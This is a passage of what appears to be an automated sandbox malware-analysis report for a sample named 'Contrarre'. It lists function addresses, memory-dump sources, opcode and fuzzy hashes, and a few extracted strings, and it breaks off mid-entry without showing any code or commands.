Instruction ID: 339a422a0e84f3a17a85e76bc2b7e465fcc5cd7d453c8bdeb477dbb9632de429
Opcode Fuzzy Hash: 1ab4c477d8e0d964c2b7c876ef2780b1a1abf54219010953149823f30e544c07
Instruction Fuzzy Hash: 3D110CB6C003498FDB10CF9AD444BDEFBF4BB88324F14842AD829A7600C379A585CFA5

Function 0A1460B0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0A14610D

Memory Dump Source

Source File: 00000000.00000002.1391314483.000000000A140000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a140000_Contrarre.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: fe7f5979ed70064d99808df8b038434c84b93e55beb7cf2c70bcda3034c8ff18
Instruction ID: 0d042bc356398a70c68515a602388c5efbab5f81401f0d67288a0b54ace5b53e
Opcode Fuzzy Hash: fe7f5979ed70064d99808df8b038434c84b93e55beb7cf2c70bcda3034c8ff18
Instruction Fuzzy Hash: C61115B5800348DFDB10DF9AD845BDEFBF8EB48314F108419E518A7640C379A584CFA5

Function 0B8BE61E Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

^,, xrefs: 0B8BE695

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ^,
API String ID: 0-1448041649
Opcode ID: ecc8179f46cf0f34c73a74263ce0faac6568f84a389f785bcb1ea63902ede3c1
Instruction ID: f60395c48c0202d70750895e48a9c354dd0114c72f223e087b9b6a4e1d9431ce
Opcode Fuzzy Hash: ecc8179f46cf0f34c73a74263ce0faac6568f84a389f785bcb1ea63902ede3c1
Instruction Fuzzy Hash: C5410774A01229CFDB64CF65D984BDAB7B2FB48201F1086B6D809E7754DB348E81CF15

Function 0B8B1880 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

OijW, xrefs: 0B8B1931

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: be4cfbca1cded982149a8e7cf391e0f19cc2ae0e7128e360f9bed3114630430d
Instruction ID: f75eb2e77392e80477d0706849b138c2a04cb8303c569e1b93e36500d3db4014
Opcode Fuzzy Hash: be4cfbca1cded982149a8e7cf391e0f19cc2ae0e7128e360f9bed3114630430d
Instruction Fuzzy Hash: B331B2B4E1421A9FCB44DFA9C481AAEFBF2BF88340F10956AC815EB724D7749A41CF51

Function 0B8B1888 Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

OijW, xrefs: 0B8B1931

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: OijW
API String ID: 0-3475513506
Opcode ID: 6019f43b292a36409afa1c633ec4ce9d2ea3c60849ab2c6ab8b2fb5e5d3be599
Instruction ID: 1202cf75b8cc81b1c1f008b5d7eae8433b37fe4b24975553c8284a2bf3f1ebc2
Opcode Fuzzy Hash: 6019f43b292a36409afa1c633ec4ce9d2ea3c60849ab2c6ab8b2fb5e5d3be599
Instruction Fuzzy Hash: CE31C3B4E14219DFCB44DFA9C481AAEFBF2BF88300F10946A8819EB724D7749A41CF51

Function 0B8B7EB0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

u|P, xrefs: 0B8B7EF7

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: u|P
API String ID: 0-1764873574
Opcode ID: 9cbc0f6e0ab164e4b46fcbadb9f05426976203cc6bf90c1bc9861582fd4a203e
Instruction ID: 9a928b24473a275a22a51dd24246b57943bece882a7dee45b1915fa26c2fd47a
Opcode Fuzzy Hash: 9cbc0f6e0ab164e4b46fcbadb9f05426976203cc6bf90c1bc9861582fd4a203e
Instruction Fuzzy Hash: 7E216BB8E0524DDFCB44CFA9D5416AEBBB2EF89300F2485AAC814E7360D7348E10CB95

Function 0B8B3588 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

?H,a, xrefs: 0B8B35CF

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ?H,a
API String ID: 0-4093759987
Opcode ID: 421ef5d56b98d3d606b9addb5f072490dd75aa2244d50bb5eb09e9300be56e8c
Instruction ID: fb804800031ceeef0042060ef059bf73bb8a56323ead624cc9958bfb9904b6a7
Opcode Fuzzy Hash: 421ef5d56b98d3d606b9addb5f072490dd75aa2244d50bb5eb09e9300be56e8c
Instruction Fuzzy Hash: C3211674E05209DFDB44DFA9C584A9DFBF2AF88200F14C5AAD519AB365E730DA01CB44

Function 0B8B3598 Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

?H,a, xrefs: 0B8B35CF

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: ?H,a
API String ID: 0-4093759987
Opcode ID: 66c41a76dcfca8f0c86933627a04f73d4788117427d8ad55a6eb0e4e1049edf2
Instruction ID: 496a8a8f07e6f1e1a3216a053900fa8d4d7fd39d956378971dfabb0de2a9dbb1
Opcode Fuzzy Hash: 66c41a76dcfca8f0c86933627a04f73d4788117427d8ad55a6eb0e4e1049edf2
Instruction Fuzzy Hash: A721E474E04609EFDB44DFA9C544A9EFBF2FF88200F14D5AA9519A7364E730DA01CB44

Function 0B8B7EC0 Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

u|P, xrefs: 0B8B7EF7

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: u|P
API String ID: 0-1764873574
Opcode ID: cadd0de8a6b94018599199c8a0567bce04c0ccf016375f1e39f9905716c4901e
Instruction ID: 88e5e142c976db3b63022573ae38f932d3796ef93c0f50e8eebea8c01273cb7a
Opcode Fuzzy Hash: cadd0de8a6b94018599199c8a0567bce04c0ccf016375f1e39f9905716c4901e
Instruction Fuzzy Hash: F01119B8E0524DDFDB48CFA9D5416AEBBF6AB88300F2084AA8519E7314D6349E41CB55

Function 0B8B7EBF Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

u|P, xrefs: 0B8B7EF7

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: u|P
API String ID: 0-1764873574
Opcode ID: 1f76ed58afb601534222efad1884c4106c338ba482cccecce83ee18441aea947
Instruction ID: fc40d814b8a611ec45dd96268bac97cdb4084048ad2fd5e31cebccd106c02538
Opcode Fuzzy Hash: 1f76ed58afb601534222efad1884c4106c338ba482cccecce83ee18441aea947
Instruction Fuzzy Hash: 9411FBB8E0524DDFDB44CFA9D5416AEFBF2AF88300F2484AA8505E7714D6349F41CB55

Function 0B8B5E79 Relevance: 1.3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

Strings

G'/., xrefs: 0B8B5EFE

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: G'/.
API String ID: 0-3562003039
Opcode ID: aeda2346f3f46fab28aab119ea5242846d44b3295ffe47dc37390630bb043e38
Instruction ID: b71731c6cca47de64f2d99744aea846ef15f09cd64428ebb6fea77860a20f928
Opcode Fuzzy Hash: aeda2346f3f46fab28aab119ea5242846d44b3295ffe47dc37390630bb043e38
Instruction Fuzzy Hash: 3E11A970A05248EFDB08DFB4D951A9EFBB2EB8A300F2084AAC005EB264E7349A54C751

Function 0B8B5E88 Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

G'/., xrefs: 0B8B5EFE

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID: G'/.
API String ID: 0-3562003039
Opcode ID: 2a635cb0a41d7fc79c30dd6d400d2f8b8c7bb8b21f6a657fb0b4b0e134ea726a
Instruction ID: f1b77acb758f0b484d9df951565b7e60fa3bf37a81e45bc612a2d988b27ac33c
Opcode Fuzzy Hash: 2a635cb0a41d7fc79c30dd6d400d2f8b8c7bb8b21f6a657fb0b4b0e134ea726a
Instruction Fuzzy Hash: 5E017C70E05608DBD748DFB4D554A9EFAB6EB99300F20D4A58405E3364E7309A50C750

Function 0B8BF948 Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7780a037b9d1570cd877082ed1349a5d95934a74bf80321c2e52df02c4a7126b
Instruction ID: 50f7dd554946a4e0084946f58767495e4f461b44d77169653188dfecb3db8752
Opcode Fuzzy Hash: 7780a037b9d1570cd877082ed1349a5d95934a74bf80321c2e52df02c4a7126b
Instruction Fuzzy Hash: 8DE16134A00209DFEF05DFB4D894BAEBBB2FB88710F148469D905A7361DA39AD41CF65

Function 0B8BAFA8 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51ba38882b27798d215aaaa7a70f7df493d5bc344a57212b568f0b24280191c6
Instruction ID: cc6cac42b83bd1d137bfe679473a2e4350429fb77f6f352bb53927015a896cde
Opcode Fuzzy Hash: 51ba38882b27798d215aaaa7a70f7df493d5bc344a57212b568f0b24280191c6
Instruction Fuzzy Hash: 6D61B374E05209CFDB48CFA9C984AEDBBB6FF89304F10902AD919AB365DB315946CF50

Function 0B8BAF98 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cae14cb41b52e32aed687abb588af0d445f1c0bd5ee19a527c687e8a8d20d176
Instruction ID: 6d54c2bdd21f70303b1b4b270c8f656cb472d990f8c02200f7b99c1d9101521a
Opcode Fuzzy Hash: cae14cb41b52e32aed687abb588af0d445f1c0bd5ee19a527c687e8a8d20d176
Instruction Fuzzy Hash: BD510774D0424CCFDB04CFA5C944AEEBBF6EF89704F10902AD419AB365DB305946CB50

Function 0B8BB770 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60d2f6e8a16408e1598fbce076e07cbc2931d2d2e375e4d56de19acd3f5a85bc
Instruction ID: d95048325b696f383c18e3af64f62164523a2653a44e504ec78c8c7b7046724c
Opcode Fuzzy Hash: 60d2f6e8a16408e1598fbce076e07cbc2931d2d2e375e4d56de19acd3f5a85bc
Instruction Fuzzy Hash: 0B41E2B4D09609CBDB08CFAAD444AEEBBF6EF8C344F14D06AD42AE7361D73049418B54

Function 0B8BB76C Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b4588d9b0a3ac135a83349c0efd4dc79edd102c920e6bd767c44b6e070b93a
Instruction ID: 0a2dd3320004b8deff1e1e75ca7a581d46dcfae471aae0646678c861ad598ba6
Opcode Fuzzy Hash: 56b4588d9b0a3ac135a83349c0efd4dc79edd102c920e6bd767c44b6e070b93a
Instruction Fuzzy Hash: F041B2B4D09208CFDB08CFAAD444AEEBBF6EF8C745F14D06AD42AE7361D73449458A58

Function 0B8B0F64 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ea7d73f7b8e6389180f063ec23e3dd8518c0fb2e6b3923da744d985a1e73f2b
Instruction ID: db93d268d15e2e848cef885dad53de90613eaff36675a49e01348352be98f493
Opcode Fuzzy Hash: 9ea7d73f7b8e6389180f063ec23e3dd8518c0fb2e6b3923da744d985a1e73f2b
Instruction Fuzzy Hash: 50416776A043489FCB11CFA9D844ADEBFF5EF49210F14846AE419E7361D335A944CFA1

Function 0B8B8718 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4fbc6cbf4038e3b967ba02f5ee6dc3d704ae1e3d15a6091c31685f8e929cc4
Instruction ID: 327e57d45980cd7d879537aad98e6d09372204b550723fd64e72d5713b66ab2d
Opcode Fuzzy Hash: 6f4fbc6cbf4038e3b967ba02f5ee6dc3d704ae1e3d15a6091c31685f8e929cc4
Instruction Fuzzy Hash: 703134B4E14209EFDB44CFA9D581AAEBBF6EB88314F20C4AAC415E7360D7349A41CB55

Function 0B8B67E0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca1ba231b336f83b61389cdd1bbc2d4dd3c3dda0b535ba4a93c905dcdbbabb3b
Instruction ID: 4067fea433e2d19c6d64ee8dcf5ff84f773b7567e4e50634e4273fae77015686
Opcode Fuzzy Hash: ca1ba231b336f83b61389cdd1bbc2d4dd3c3dda0b535ba4a93c905dcdbbabb3b
Instruction Fuzzy Hash: 8631F274E01219DBDB04CFA9E445AEEFBF2FB88310F10852AE925A7360E7345945CF50

Function 0B8B8708 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54dc67784e6220ecc106cb4706c55626a26a6b3a4dcfb06134481a2bdc7393c2
Instruction ID: 6b29f9768d7af1f4393903d7f3c585e922666f236f8aaac72150c40a47def593
Opcode Fuzzy Hash: 54dc67784e6220ecc106cb4706c55626a26a6b3a4dcfb06134481a2bdc7393c2
Instruction Fuzzy Hash: 663142B0E04249DFDB44CFA9D485AEEBBF2EB88314F2484AAC415EB360D7349A01CB55

Function 0B8B67D8 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a38b02db30eb7bddfd7a070984bb79d6dd5091b350b848752679c5b95757aa3
Instruction ID: bae1c2fadb315ce35b359b42b4147942a15af0e0cc10fff4bf5e66fdc16676da
Opcode Fuzzy Hash: 7a38b02db30eb7bddfd7a070984bb79d6dd5091b350b848752679c5b95757aa3
Instruction Fuzzy Hash: 0231E274E00219DBDB04DFA9E845AEEFBB2FB88310F10842AE925A7350E7345945CFA0

Function 0B8BE4C5 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2372c5eea6747e9b903efb1353a48f573eca1f4ac39e5abf9ec7da8763a3d258
Instruction ID: 7a6a62b31ed4dff37a0820419f99cbd6662b75ea7a36c6d72496e2bfe9cc4344
Opcode Fuzzy Hash: 2372c5eea6747e9b903efb1353a48f573eca1f4ac39e5abf9ec7da8763a3d258
Instruction Fuzzy Hash: 8A315774A05209CFDB10CF39E984AD9BBB2EB49202F148AA5D549D7321DB349D858F00

Function 0B8B19B1 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca695c95f3ea55b9f28869e7d2212c4c080e9aa18d3087fd4972f25ebdbe8255
Instruction ID: 37e4447d4bf86b3eb51e15b0f2bcd5f573971d2b1e244d2e9920a8da7f83f99b
Opcode Fuzzy Hash: ca695c95f3ea55b9f28869e7d2212c4c080e9aa18d3087fd4972f25ebdbe8255
Instruction Fuzzy Hash: 82310574E142499FCB44DFAAC5559AEBBF1FF8A300F1085AAC414EB325D2309A458F51

Function 0145D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1384936513.000000000145D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0145D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_145d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7523e1388c100344924b7ddb9e7a0103ceb5d25a56cb87e015fb1608a29581f
Instruction ID: 99eb4407c5b0b1487f9a5a0feb3a3d8e45d0ad2e2af8e43ca672b419033e1b6b
Opcode Fuzzy Hash: f7523e1388c100344924b7ddb9e7a0103ceb5d25a56cb87e015fb1608a29581f
Instruction Fuzzy Hash: EB21F172904248EFDB45DF54D980B26BF65FF88318F20C56AED090B267C336D456CAA2

Function 0146D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385001440.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4e277a09dfc2060ed1886a976c6f1052c3ff9b5577b8d9346b4a4760963c8ab
Instruction ID: da4aff28a714370648f262a3fc8e7ea9a6271a324e9ec93926ff5dc7834f7ed6
Opcode Fuzzy Hash: c4e277a09dfc2060ed1886a976c6f1052c3ff9b5577b8d9346b4a4760963c8ab
Instruction Fuzzy Hash: 4721F871A04244DFDB05DF54D5C0B26BB69FB84328F24C56ED9894B362C336D446CA62

Function 0146D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385001440.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1eab9830f3aced70feab9c36dbfc0c4758d4ae18139f8ffeea37479b6dff78b
Instruction ID: 8277c61faabdab2034a4d5f4692583534f52e909e55b939110378155119230aa
Opcode Fuzzy Hash: d1eab9830f3aced70feab9c36dbfc0c4758d4ae18139f8ffeea37479b6dff78b
Instruction Fuzzy Hash: 9F2106B1A04340DFDB15DF54D480B16BB69EB8431CF20C56ED9894B366C336D447CA62

Function 0B8B19C0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 768e6818d35306326d1d325f3fade49f3dc4ef36e5eec08b839ef59b6d8d2159
Instruction ID: 8b65336e786a220b4da0565f91882eb490ac8f58d89b32781e0dbd0296f674bd
Opcode Fuzzy Hash: 768e6818d35306326d1d325f3fade49f3dc4ef36e5eec08b839ef59b6d8d2159
Instruction Fuzzy Hash: BE21F870E10209DFDB44DFA9C555AAEBBF1BF89340F10D5A6C418EB324E730AA418F91

Function 0B8BE3CC Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 660cf2090d0ce67d54d48aade8e3010830220f5a2334cd1b6f4955e6f7506796
Instruction ID: 739c2dad00af52075a731cb497f69d5709e80def606598e46b3eeeadb7e0aa94
Opcode Fuzzy Hash: 660cf2090d0ce67d54d48aade8e3010830220f5a2334cd1b6f4955e6f7506796
Instruction Fuzzy Hash: 713167B4904205CFDB54CF69E688AEDBBF6FF48206B209569C40AD7362DB309C85CF11

Function 0B8BF880 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d3b86411dfb25334d296610a59001a73adb74d4b5190a666a2ecaeeedb1ea7
Instruction ID: d261b43f6981ae0874c30f43ffda6430030984757294e70b3c616fa0e31ebee4
Opcode Fuzzy Hash: 43d3b86411dfb25334d296610a59001a73adb74d4b5190a666a2ecaeeedb1ea7
Instruction Fuzzy Hash: 15118134F00209ABEB149B79DC20BFFBBA6AF85710F048179DA56DB361EA708D419790

Function 0B8B3490 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb87151acb078cc7eb8aead396bc373f81525ca111e774ad94d2d98a31898d8
Instruction ID: e6dd64ad09d9e3fe668d3ee938898314d95f8f4b742fdfc6b4d827cfd3837e51
Opcode Fuzzy Hash: ecb87151acb078cc7eb8aead396bc373f81525ca111e774ad94d2d98a31898d8
Instruction Fuzzy Hash: 082136B0E0120ADFDB09CFA9C541AAEFBF1BF9A200F1485AAC415E7360E7309A05CB55

Function 0B8BB918 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de91cd4a5384cd3a2c45f8015469a50d7f2139007fc9aee1d23e80faf66ecc23
Instruction ID: bc378466c4817a097ae8d660a14014c4c4df14d2eebe2a3f8426c37f540c6fd3
Opcode Fuzzy Hash: de91cd4a5384cd3a2c45f8015469a50d7f2139007fc9aee1d23e80faf66ecc23
Instruction Fuzzy Hash: 5121B4B4D08209CFCB44CFA9C190AEEBBF5EF49304F2091AAD419A7726D7309A41CF51

Function 0B8B1E18 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ddbe5e0e811775d3743925730fdb3148dd29ba037941ef973001adcb064f586
Instruction ID: 3fbdc1a1897257b298e6453e22d4a09340d3a25ca37fe4a796adde679f213162
Opcode Fuzzy Hash: 0ddbe5e0e811775d3743925730fdb3148dd29ba037941ef973001adcb064f586
Instruction Fuzzy Hash: A92147B4E04209DFCB49DFA9D554AAEBBB2FF89300F1485AAC404EB311D7349A41CF50

Function 0B8BC87E Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ccd762c0069745a085b73ae28e86d35105cd4674cac4a15f8672706268a96e6
Instruction ID: 3279e6161ccfc8b6fbabf2ff83cba07ef9b3beb67286374bcb0eb60e40719180
Opcode Fuzzy Hash: 3ccd762c0069745a085b73ae28e86d35105cd4674cac4a15f8672706268a96e6
Instruction Fuzzy Hash: B521E6B4D09248CFDB49CF6AC494AE9BFF6EF8A200F1490AAD459EB266D7345541CF10

Function 0B8B34A0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1391754427.000000000B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8b0000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c5cb5e40b74314a30ecee703daa33042c12f59e99544ebd159143e6c1ae957
Instruction ID: 768e365606dfa111cd2323be28d7a5ae8b84f29545e00b8b53c500f2ce548679
Opcode Fuzzy Hash: 75c5cb5e40b74314a30ecee703daa33042c12f59e99544ebd159143e6c1ae957
Instruction Fuzzy Hash: 17212AB0E04209DFDB48DFA9D541AAEFBF1BF89200F10D5AA8415E7360E7309B05CB95

Function 0146D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1385001440.000000000146D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0146D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_146d000_Contrarre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615999eca03719bdc74402a901c8bd70c4a98764109433d6f99e0cda2ce11b15
Instruction ID: 76191a287f04209bf0827e8e8b96ab30c91b79195e5367ca2329ed7f0f597973
Opcode Fuzzy Hash: 615999eca03719bdc74402a901c8bd70c4a98764109433d6f99e0cda2ce11b15
Instruction Fuzzy Hash: 282183755093808FD717CF24D590716BF71EB46218F28C5DBD8898F2A7C33A980ACB62

Function 0B8BB928 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

